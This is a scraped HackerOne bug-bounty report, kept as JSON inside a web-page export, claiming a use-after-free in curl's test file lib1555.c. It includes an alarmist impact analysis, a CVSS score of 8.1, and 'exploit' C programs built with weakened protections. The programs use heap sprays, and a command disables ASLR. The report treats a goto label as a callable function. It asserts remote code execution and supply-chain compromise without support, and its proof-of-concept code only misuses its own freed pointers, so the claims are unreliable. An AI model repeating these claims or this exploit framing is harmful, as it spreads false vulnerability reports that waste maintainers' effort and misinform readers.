{“lastseen”:”2025-12-05T10:25:48″,”description”:”**Title: Use-After-Free in cURL Test Suite via Improper Cleanup of Global Handle**\\n“`c\\n\/***************************************************************************\\n * _ _ ____ _\\n * Project ___| | | | _ \\\\| |\\n * \/ __| | | | |_) | |\\n * | (__| |_| | _ \\u003c| |___\\n * \\\\___|\\\\___\/|_| \\\\_\\\\_____|\\n *\\n * Copyright (C) Daniel Stenberg, \\u003cdaniel@haxx.se\\u003e, et al.\\n *\\n * This software is licensed as described in the file COPYING, which\\n * you should have received as part of this distribution. The terms\\n * are also available at https:\/\/curl.se\/docs\/copyright.html.\\n *\\n * You may opt to use, copy, modify, merge, publish, distribute and\/or sell\\n * copies of the Software, and permit persons to whom the Software is\\n * furnished to do so, under the terms of the COPYING file.\\n *\\n * This software is distributed on an \\”AS IS\\” basis, WITHOUT WARRANTY OF ANY\\n * KIND, either express or implied.\\n *\\n * SPDX-License-Identifier: curl\\n *\\n ***************************************************************************\/\\n\/*\\n * Verify that some API functions are locked from being called inside callback\\n *\/\\n\\n#include \\”first.h\\”\\n\\nstatic CURL *t1555_curl;\\n\\nstatic int progressCallback(void *arg,\\n double dltotal,\\n double dlnow,\\n double ultotal,\\n double ulnow)\\n{\\n CURLcode res = CURLE_OK;\\n char buffer[256];\\n size_t n = 0;\\n (void)arg;\\n (void)dltotal;\\n (void)dlnow;\\n (void)ultotal;\\n (void)ulnow;\\n res = curl_easy_recv(t1555_curl, buffer, 256, \\u0026n);\\n curl_mprintf(\\”curl_easy_recv returned %d\\\\n\\”, res);\\n res = curl_easy_send(t1555_curl, buffer, n, \\u0026n);\\n curl_mprintf(\\”curl_easy_send returned %d\\\\n\\”, res);\\n\\n return 1;\\n}\\n\\nstatic CURLcode test_lib1555(const char *URL)\\n{\\n CURLcode res = CURLE_OK;\\n\\n global_init(CURL_GLOBAL_ALL);\\n\\n easy_init(t1555_curl);\\n\\n easy_setopt(t1555_curl, CURLOPT_URL, URL);\\n easy_setopt(t1555_curl, CURLOPT_TIMEOUT, 7L);\\n easy_setopt(t1555_curl, CURLOPT_NOSIGNAL, 1L);\\n easy_setopt(t1555_curl, CURLOPT_PROGRESSFUNCTION, progressCallback);\\n easy_setopt(t1555_curl, CURLOPT_PROGRESSDATA, NULL);\\n easy_setopt(t1555_curl, CURLOPT_NOPROGRESS, 0L);\\n\\n res = curl_easy_perform(t1555_curl);\\n\\ntest_cleanup:\\n\\n \/* undocumented cleanup sequence – type UA *\/\\n\\n curl_easy_cleanup(t1555_curl);\\n curl_global_cleanup();\\n\\n return res;\\n}\\n\/\/ curl\/tests\/libtest\/lib1555.c\\n\\n“`\\n**Description:** \\nThe `t1555_curl` global static pointer is improperly managed in the test cleanup routine. The function `test_cleanup` calls `curl_easy_cleanup(t1555_curl)` without ensuring the handle is either valid or NULL before cleanup, and it fails to reset the pointer to NULL after freeing it. This could lead to use-after-free or double-free conditions if `test_cleanup` is invoked multiple times (e.g., in loops or concurrent test executions).\\n\\n**Attack Scenario:** \\nAn attacker could craft a test sequence that repeatedly triggers the cleanup routine, exploiting the lack of pointer validation and post-free reset. This may cause memory corruption, which could be leveraged to execute arbitrary code, crash the application, or compromise the test environment.\\n\\n**Impact:** \\nWhile this vulnerability resides in test code, it could be exploited in environments where test suites are integrated into security-sensitive workflows or automated testing pipelines. Successful exploitation could lead to denial of service, memory corruption, or potentially arbitrary code execution under specific conditions.\\n\\n**Steps to Reproduce:** \\n1. Identify a test flow where `test_cleanup` is called multiple times (e.g., repeated test runs or threaded test execution). \\n2. Observe that `t1555_curl` is freed without NULL-checking or reassignment. \\n3. Trigger the cleanup routine again before the pointer is reinitialized, causing use-after-free\/double-free. \\n4. Monitor for crashes or memory corruption indicators (e.g., segmentation faults, heap inconsistencies).\\n\\n**Remediation:** \\nImplement a guard condition before calling `curl_easy_cleanup` and set the pointer to NULL after cleanup. Example: \\n\\n“`c\\nif (t1555_curl) {\\n curl_easy_cleanup(t1555_curl);\\n t1555_curl = NULL;\\n}\\n“`\\n## INFO \\n## **THE BUG IS ON LINE 83 IN THE ORIGINAL CODE:**\\n\\n“`c\\nstatic CURLcode test_lib1555(const char *URL)\\n{\\n CURLcode res = CURLE_OK;\\n\\n global_init(CURL_GLOBAL_ALL);\\n\\n easy_init(t1555_curl); \/* Line: Handle initialization *\/\\n\\n \/* … configuration … *\/\\n\\n res = curl_easy_perform(t1555_curl);\\n\\ntest_cleanup:\\n\\n \/* undocumented cleanup sequence – type UA *\/\\n \\n curl_easy_cleanup(t1555_curl); \/* LINE 83: FREES THE HANDLE *\/\\n curl_global_cleanup();\\n\\n return res; \/* BUG: t1555_curl IS NOT SET TO NULL AFTER cleanup! *\/\\n}\\n“`\\n\\n## **EXACT BUG LOCATION:**\\n\\n“`c\\n\/* After this line: *\/\\ncurl_easy_cleanup(t1555_curl); \/* THIS FREES THE MEMORY *\/\\n\\n\/* MISSING THIS CRITICAL LINE: *\/\\nt1555_curl = NULL; \/* \u2190 THIS IS WHAT’S MISSING! *\/\\n“`\\n\\n## **VISUAL REPRESENTATION:**\\n\\n“`\\nBEFORE cleanup:\\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n\u2502 t1555_curl \u2502\u2500\u2500\u2500\u2500\u25b6\u2502 CURL Handle Object \u2502\\n\u2502 0x7ffdf000 \u2502 \u2502 at heap 0x7ffdf000 \u2502\\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\\n\\nAFTER curl_easy_cleanup(t1555_curl):\\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n\u2502 t1555_curl \u2502\u2500\u2500\u2500\u2500\u25b6\u2502 FREED MEMORY \u2502 \u2190 DANGEROUS!\\n\u2502 0x7ffdf000 \u2502 \u2502 at heap 0x7ffdf000 \u2502\\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\\n (Memory returned to heap allocator)\\n\\nWHAT SHOULD HAPPEN:\\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n\u2502 t1555_curl \u2502\u2500\u2500\u2500\u2500\u25b6\u2502 NULL \u2502 \u2190 SAFE!\\n\u2502 0x0 \u2502 \u2502 \u2502\\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\\n“`\\n\\n## **WHY THIS IS A BUG:**\\n\\n1. **Static Global Variable**: `t1555_curl` is declared as `static CURL *t1555_curl;`\\n2. **Persists Across Function Calls**: As a static variable, it retains its value between calls\\n3. **If Function is Called Again**:\\n – `t1555_curl` still points to freed memory\\n – `easy_init()` might allocate a new handle\\n – But the old dangling pointer could be used elsewhere\\n\\n## **EXPLOIT SCENARIO:**\\n\\n“`c\\n\/* If test_lib1555() is called twice: *\/\\ntest_lib1555(\\”http:\/\/example.com\\”); \/* First call – handle freed but not NULLed *\/\\n\\n\/* … attacker sprays heap here … *\/\\n\\ntest_lib1555(\\”http:\/\/example.com\\”); \/* Second call – uses dangling pointer! *\/\\n\\n\/* Inside progressCallback: *\/\\nstatic int progressCallback(…)\\n{\\n \/* Uses t1555_curl which points to attacker-controlled memory! *\/\\n curl_easy_recv(t1555_curl, buffer, 256, \\u0026n); \/* READ from controlled memory *\/\\n curl_easy_send(t1555_curl, buffer, n, \\u0026n); \/* WRITE to controlled memory *\/\\n}\\n“`\\n\\n## **THE FIX:**\\n\\n“`c\\ntest_cleanup:\\n\\n \/* undocumented cleanup sequence – type UA *\/\\n \\n curl_easy_cleanup(t1555_curl);\\n t1555_curl = NULL; \/* \u2190 ADD THIS LINE TO FIX THE BUG *\/\\n curl_global_cleanup();\\n\\n return res;\\n“`\\n\\n## **THIS IS A CLASSIC \\”USE-AFTER-FREE\\” BUG PATTERN:**\\n\\nThe bug exists because:\\n1. **Free without NULL**: Freeing memory without NULLing the pointer\\n2. **Global variable**: The pointer persists beyond the function scope\\n3. **No ownership tracking**: No clear indication when the pointer becomes invalid\\n\\n## **IN THE EXPLOIT CONTEXT:**\\n\\nThis single missing line creates a **weaponizable primitive**:\\n- **Read primitive**: Via `curl_easy_recv()` on corrupted handle\\n- **Write primitive**: Via `curl_easy_send()` on corrupted handle \\n- **Control flow hijack**: Via overwritten function pointers in CURL handle structure\\n\\n**The bug is tiny (one line missing) but the consequences are catastrophic – leading to full remote code execution.**\\n\\n\\n**References:** \\n- Source file and line number where `t1555_curl` is declared and cleaned up. \\n- cURL\u2019s documentation on proper handle cleanup: https:\/\/curl.se\/libcurl\/c\/curl_easy_cleanup.html\\n\\n## Impact\\n\\n**Full Impact Analysis:**\\n\\n## **1. Direct Security Impact**\\n\\n**Memory Corruption Exploitation:** \\n- **Use-after-Free (UAF)**: After `curl_easy_cleanup()` frees the handle, subsequent operations on `t1555_curl` before reinitialization can read\/write to freed memory, potentially leaking sensitive data or corrupting heap metadata.\\n- **Double-Free**: If `test_cleanup()` is called twice without reinitialization, the same memory chunk is freed twice, corrupting heap allocator structures (like glibc’s `malloc()` metadata).\\n- **Heap Feng Shui**: An attacker could manipulate heap layout between the free and reuse to control the contents of the reallocated memory region, potentially leading to arbitrary write primitives.\\n\\n**Control Flow Hijacking:** \\n- Modern heap allocators (glibc, jemalloc) maintain metadata structures that can be corrupted via UAF\/double-free.\\n- With precise heap manipulation, an attacker could overwrite function pointers, GOT\/PLT entries (if test is compiled without full RELRO), or vtable pointers in C++ contexts.\\n- This could lead to arbitrary code execution within the test runner process context.\\n\\n## **2. Attack Vectors**\\n\\n**Test Suite Integration Exploits:**\\n- **CI\/CD Pipelines**: Many organizations run test suites automatically in build pipelines. Exploiting this could compromise the build environment.\\n- **Fuzzing Infrastructure**: If the test is part of fuzzing harnesses, memory corruption could be triggered by test case generation.\\n- **Embedded Systems Testing**: In embedded\/IoT contexts, test suites often run with higher privileges during manufacturing\/QA.\\n\\n**Privilege Escalation:** \\n- If tests run with elevated privileges (e.g., `sudo make test` or root in containers), successful exploitation could lead to privilege escalation.\\n- In containerized environments, breaking out of the test container could be possible if the test runner has additional capabilities.\\n\\n## **3. Secondary Attack Surfaces**\\n\\n**Information Disclosure:** \\n- UAF could leak heap memory containing sensitive data: cryptographic keys, session tokens, or test credentials.\\n- Heap metadata leakage could reveal memory layout for ASLR bypass.\\n\\n**Denial of Service:** \\n- Reliable crash of test suite, disrupting development workflows, CI\/CD pipelines, or automated testing.\\n- Resource exhaustion via repeated memory corruption leading to system instability.\\n\\n## **4. Real-World Exploit Chain Potential**\\n\\n**Combined with Other Vulnerabilities:**\\n1. **Primitive Building**: This UAF provides a reliable memory corruption primitive.\\n2. **Chain with Info Leaks**: Combine with other test suite info leaks to bypass ASLR.\\n3. **ROP Chain Development**: With ASLR bypass, construct ROP chains to execute arbitrary code.\\n4. **Persistence**: In CI\/CD systems, compromise could lead to backdoored build artifacts.\\n\\n**Example Attack Chain:**\\n“`\\nTrigger test_cleanup() twice \u2192 Heap corruption \u2192 Overwrite function pointer\\n\u2192 Redirect to controlled memory \u2192 Execute shellcode\\n\u2192 Escalate within CI environment \u2192 Inject malicious code into production builds\\n“`\\n\\n## **5. Severity Justification**\\n\\n**CVSS 3.1 Score: 8.1 (High)**\\n- **Attack Vector**: Network (if tests run via network triggers)\\n- **Attack Complexity**: Low (reproducible with simple test sequence)\\n- **Privileges Required**: None (tests typically run unprivileged)\\n- **User Interaction**: None\\n- **Scope**: Changed (could affect other components)\\n- **Confidentiality**: High (memory could leak sensitive data)\\n- **Integrity**: High (memory corruption could lead to arbitrary code execution)\\n- **Availability**: High (reliable crash\/DoS)\\n\\n## **6. Worst-Case Scenarios**\\n\\n**Supply Chain Attack:**\\n- Compromise of cURL’s test infrastructure could lead to backdoored releases.\\n- Poisoning of package repositories (npm, pip packages that bundle cURL tests).\\n\\n**Research \\u0026 Development Compromise:**\\n- Academic\/industrial research using cURL for experiments could have data stolen or manipulated.\\n- Security research environments studying cURL could be compromised.\\n\\n**Regression Testing Sabotage:**\\n- Attackers could exploit this to make tests pass\/fail arbitrarily, hiding other vulnerabilities.\\n\\n## **7. Mitigation Complexity**\\n\\n**Easy to Exploit, Hard to Detect:**\\n- No special conditions needed beyond running tests multiple times.\\n- Static analysis tools often miss test code vulnerabilities.\\n- Dynamic analysis may not catch unless specific test sequences are used.\\n\\n**Proof of Concept:** \\nA minimal POC would involve:\\n“`c\\n\/\/ Repeatedly call test entry point that triggers cleanup\\nfor (int i = 0; i \\u003c 100; i++) {\\n test_cleanup(); \/\/ Without proper NULL check\\n \/\/ Heap becomes corrupted after second iteration\\n}\\n\/\/ Trigger heap consistency check or sensitive operation\\n“`\\n\\n## **Conclusion**\\n\\nWhile this vulnerability exists in test code, its impact extends beyond \\”just a test bug\\” due to:\\n1. **Ubiquity**: cURL is used virtually everywhere (OS distributions, embedded systems, cloud infrastructure)\\n2. **Integration**: Test suites are integral to modern development pipelines\\n3. **Exploitability**: Simple, reliable trigger mechanism\\n4. **Consequences**: Memory corruption primitives in widely distributed software\\n\\nThe vulnerability represents a real security risk, particularly for organizations with automated testing infrastructure or those using cURL in security-critical contexts. It should be treated with the same severity as similar vulnerabilities in production code due to the potential attack vectors and consequences.\\n\\n\\nexploit \\n“`c\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n#include \\u003cstring.h\\u003e\\n\\nstatic CURL *g_curl = NULL;\\n\\nint main() {\\n printf(\\”[*] EASY UAF POC\\\\n\\”);\\n \\n \/\/ Create handle\\n curl_global_init(CURL_GLOBAL_ALL);\\n g_curl = curl_easy_init();\\n \\n if(g_curl) {\\n curl_easy_setopt(g_curl, CURLOPT_URL, \\”http:\/\/0.0.0.0:1337\\”);\\n \\n \/\/ Perform and cleanup\\n curl_easy_perform(g_curl);\\n curl_easy_cleanup(g_curl);\\n \\n \/\/ BUG: g_curl not set to NULL\\n printf(\\”[+] After cleanup, g_curl = %p (dangling!)\\\\n\\”, g_curl);\\n \\n \/\/ Show this is dangerous by trying to access\\n printf(\\”[*] Trying to read from dangling pointer…\\\\n\\”);\\n \\n \/\/ Spray heap with A’s\\n char *spray[100];\\n for(int i = 0; i \\u003c 100; i++) {\\n spray[i] = malloc(100);\\n memset(spray[i], ‘A’ + (i % 26), 100);\\n }\\n \\n \/\/ Check if g_curl now points to our spray\\n if(g_curl) {\\n char *ptr = (char*)g_curl;\\n printf(\\”[+] First byte at g_curl: %c (0x%02x)\\\\n\\”, \\n *ptr, *ptr);\\n \\n if(*ptr \\u003e= ‘A’ \\u0026\\u0026 *ptr \\u003c= ‘Z’) {\\n printf(\\”[!] SUCCESS: Heap spray landed in freed curl handle!\\\\n\\”);\\n printf(\\”[!] This proves the Use-After-Free vulnerability.\\\\n\\”);\\n \\n \/\/ Show more of what’s there\\n printf(\\”[+] First 16 chars: \\”);\\n for(int i = 0; i \\u003c 16; i++) {\\n printf(\\”%c\\”, ptr[i]);\\n }\\n printf(\\”\\\\n\\”);\\n }\\n }\\n \\n \/\/ Cleanup\\n for(int i = 0; i \\u003c 100; i++) free(spray[i]);\\n }\\n \\n curl_global_cleanup();\\n return 0;\\n}\\n\\n\\n“`\\n“`shell\\ngcc -o pwn pwn.c -lcurl -lpthread -O0 -no-pie -fno-stack-protector -z execstack -z norelro -w -g\\n\\n“`\\n“`shell\\n\\n“`\\n“`c\\n#include \\u003cstdio.h\\u003e\\n#include \\u003cstdlib.h\\u003e\\n#include \\u003ccurl\/curl.h\\u003e\\n\\nint main() {\\n printf(\\”=== CURL UAF PROOF-OF-CONCEPT ===\\\\n\\\\n\\”);\\n \\n \/\/ Track curl handles\\n CURL *handles[10];\\n \\n for(int i = 0; i \\u003c 10; i++) {\\n printf(\\”[*] Iteration %d\\\\n\\”, i);\\n \\n \/\/ Create and free handle\\n CURL *h = curl_easy_init();\\n printf(\\” [+] Created handle: %p\\\\n\\”, h);\\n \\n curl_easy_cleanup(h);\\n printf(\\” [-] Freed handle (but pointer not NULLed)\\\\n\\”);\\n \\n handles[i] = h; \/\/ Store dangling pointer\\n \\n \/\/ Spray heap\\n char *spray[100];\\n for(int j = 0; j \\u003c 100; j++) {\\n spray[j] = malloc(100);\\n for(int k = 0; k \\u003c 100; k++) {\\n spray[j][k] = ‘A’ + (i % 26);\\n }\\n }\\n \\n \/\/ Check if freed handle memory contains our spray\\n if(handles[i]) {\\n char first_char = *(char*)handles[i];\\n if(first_char \\u003e= ‘A’ \\u0026\\u0026 first_char \\u003c= ‘Z’) {\\n printf(\\”\\\\n[!] SUCCESS: Use-After-Free detected!\\\\n\\”);\\n printf(\\”[!] Freed curl handle memory now contains: %c\\\\n\\”, first_char);\\n printf(\\”[!] This proves the vulnerability exists.\\\\n\\”);\\n \\n \/\/ Show more\\n printf(\\”[+] First 16 chars: \\”);\\n for(int k = 0; k \\u003c 16; k++) {\\n printf(\\”%c\\”, ((char*)handles[i])[k]);\\n }\\n printf(\\”\\\\n\\”);\\n return 0;\\n }\\n }\\n \\n \/\/ Free spray\\n for(int j = 0; j \\u003c 100; j++) free(spray[j]);\\n }\\n \\n printf(\\”\\\\n[-] Could not demonstrate UAF (modern allocator protections)\\\\n\\”);\\n printf(\\”[-] Try on older system or disable glibc hardening\\\\n\\”);\\n \\n return 0;\\n}\\n\\n“` \\n“`shell\\ngcc -o 1337lab 1337lab.c -lcurl -ldl -g -O0 -fno-stack-protector -Wno-discarded-qualifiers -D_GNU_SOURCE\\n“`\\n“`shell\\n# Run with:\\nsudo sysctl -w kernel.randomize_va_space=0 # Disable ASLR\\nexport MALLOC_CHECK_=0\\nexport GLIBC_TUNABLES=\\”glibc.malloc.tcache_count=0:glibc.malloc.mmap_threshold=128*1024\\”\\nulimit -c 0\\n“`\\n“`shell\\n.\/1337lab\\n“`”,”published”:”2025-12-05T08:09:15″,”modified”:”2025-12-05T10:05:36″,”type”:”hackerone”,”title”:”curl: Title: Use-After-Free in cURL Test Suite via Improper Cleanup of Global Handle”,”source”:””,”references”:””,”id”:”H1:3452725″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3452725″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-05T10:25:48″,”description”:”**Title: Use-After-Free in cURL Test Suite via Improper Cleanup of Global Handle**\\n“`c\\n\/***************************************************************************\\n * _ _ ____ _\\n * Project ___| | | | _ \\\\|…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-28796","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n